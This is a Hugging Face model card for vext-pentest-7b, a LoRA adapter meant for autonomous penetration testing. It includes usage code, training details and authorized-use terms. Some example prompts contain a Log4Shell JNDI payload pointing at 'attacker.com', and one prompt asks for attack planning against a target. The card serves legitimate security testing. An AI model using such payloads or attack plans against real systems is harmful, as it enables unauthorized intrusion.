Hugging Face's logo

VextLabs
/
vext-pentest-7b

Text Generation
PEFT
Safetensors
English
security
pentesting
cybersecurity
lora
qwen2.5
vext
vulnerability-detection
red-team
infosec
autonomous-agents
conversational
Eval Results (legacy)
Model card Files
xet
Community
vext-pentest-7b / README.md
VextLabs's picture
VextLabs
Upload VEXT Pentest 7B LoRA adapter v1.1
923370e verified
preview code
|
raw
history blame contribute delete
5.45 kB
metadata 
base_model: Qwen/Qwen2.5-7B-Instruct
library_name: peft
license: apache-2.0
pipeline_tag: text-generation
tags:
  - security
  - pentesting
  - cybersecurity
  - lora
  - peft
  - qwen2.5
  - vext
  - vulnerability-detection
  - red-team
  - infosec
  - autonomous-agents
datasets:
  - custom
language:
  - en
widget:
  - text: |-
      Nuclei scan results:
      [critical] CVE-2021-44228 Log4Shell detected at /api/login
      POC: ${{jndi:ldap://attacker.com/a}}
    example_title: Vulnerability Analysis
  - text: |-
      nmap -sV scan output:
      22/tcp open ssh OpenSSH 8.2p1
      80/tcp open http Apache httpd 2.4.41
      443/tcp open ssl/http nginx 1.18.0
      3306/tcp open mysql MySQL 5.7.32
    example_title: Port Scan Analysis
  - text: |-
      Given the following reconnaissance data, plan the next attack steps:
      Target: testapp.example.com
      Open ports: 80, 443, 8080
      Technologies: PHP 7.4, MySQL 5.7, Apache 2.4
      Directories found: /admin, /api/v1, /uploads
    example_title: Attack Planning
model-index:
  - name: vext-pentest-7b
    results:
      - task:
          type: text-generation
          name: Autonomous Penetration Testing
        dataset:
          name: VEXT Security Testing Data
          type: custom
        metrics:
          - name: Validated Findings (True Positives)
            type: custom
            value: 139
          - name: Total Findings Generated
            type: custom
            value: 1977
          - name: Unique Vulnerability Types
            type: custom
            value: 77
          - name: OWASP Categories Covered
            type: custom
            value: 8
          - name: Autonomous Runs
            type: custom
            value: 306

vext-pentest-7b

A security-specialized language model by VEXT Labs Inc for autonomous penetration testing and vulnerability assessment.

Built as a LoRA adapter on Qwen/Qwen2.5-7B-Instruct, fine-tuned on real-world security testing data including tool output interpretation, attack planning, vulnerability classification, and remediation guidance.

What This Model Does

vext-pentest-7b is trained to:

  • Interpret security tool output — Parse and reason about results from nuclei, dalfox, sqlmap, gobuster, naabu, and 20+ other security tools
  • Plan attack strategies — Given a target scope and reconnaissance data, decide which tools to run and in what order
  • Classify vulnerabilities — Distinguish true positives from false positives with high accuracy
  • Generate remediation advice — Provide actionable fix recommendations for discovered vulnerabilities

Usage

With vLLM (Recommended for Production) 

# Start vLLM with LoRA support
python -m vllm.entrypoints.openai.api_server \
    --model Qwen/Qwen2.5-7B-Instruct \
    --enable-lora \
    --lora-modules vext-pentest-7b=/path/to/adapter \
    --max-lora-rank 32

With PEFT + Transformers 

from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base = AutoModelForCausalLM.from_pretrained("Qwen/Qwen2.5-7B-Instruct", torch_dtype="auto", device_map="auto")
model = PeftModel.from_pretrained(base, "VextLabs/vext-pentest-7b")
tokenizer = AutoTokenizer.from_pretrained("VextLabs/vext-pentest-7b")

messages = [
    {"role": "system", "content": "You are a security testing agent. Analyze the following tool output and identify vulnerabilities."},
    {"role": "user", "content": "Nuclei scan results:\n[critical] CVE-2021-44228 Log4Shell detected at /api/login\nPOC: ${jndi:ldap://attacker.com/a}"}
]

text = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
inputs = tokenizer(text, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=512)
print(tokenizer.decode(output[0], skip_special_tokens=True))

Training Details

Parameter Value
Base model Qwen/Qwen2.5-7B-Instruct
Method LoRA (Low-Rank Adaptation)
Rank 32
Alpha 64
Target modules k_proj, v_proj, q_proj, down_proj, o_proj, gate_proj, up_proj
Training steps 5,000
Training samples 0
Final loss 0.5114268112182617
Precision bfloat16

Training Data

Fine-tuned on proprietary security testing data generated by the VEXT platform, including:

  • Tool execution traces (input parameters, raw output, parsed results)
  • Attack planning decisions (which tool to use, why, expected outcomes)
  • Vulnerability validation (true positive vs false positive classification)
  • Multi-step attack chains (reconnaissance → enumeration → exploitation)

Data was collected from authorized testing against intentionally vulnerable applications (OWASP Juice Shop, DVWA, bWAPP, WebGoat, and others) and authorized bug bounty targets.

Responsible Use

This model is intended for authorized security testing only. It should be used:

  • Within the scope of authorized penetration testing engagements
  • Against applications you own or have explicit permission to test
  • In CTF (Capture the Flag) competitions and security training environments
  • For defensive security research and vulnerability assessment

Do not use this model for unauthorized access to computer systems.

About VEXT Labs Inc

VEXT Labs is building autonomous security testing agents that combine LLM reasoning with real security tools. Our agents run full penetration tests — from reconnaissance to exploitation to reporting — with human-level decision making.

Learn more at tryvext.com

License

Apache 2.0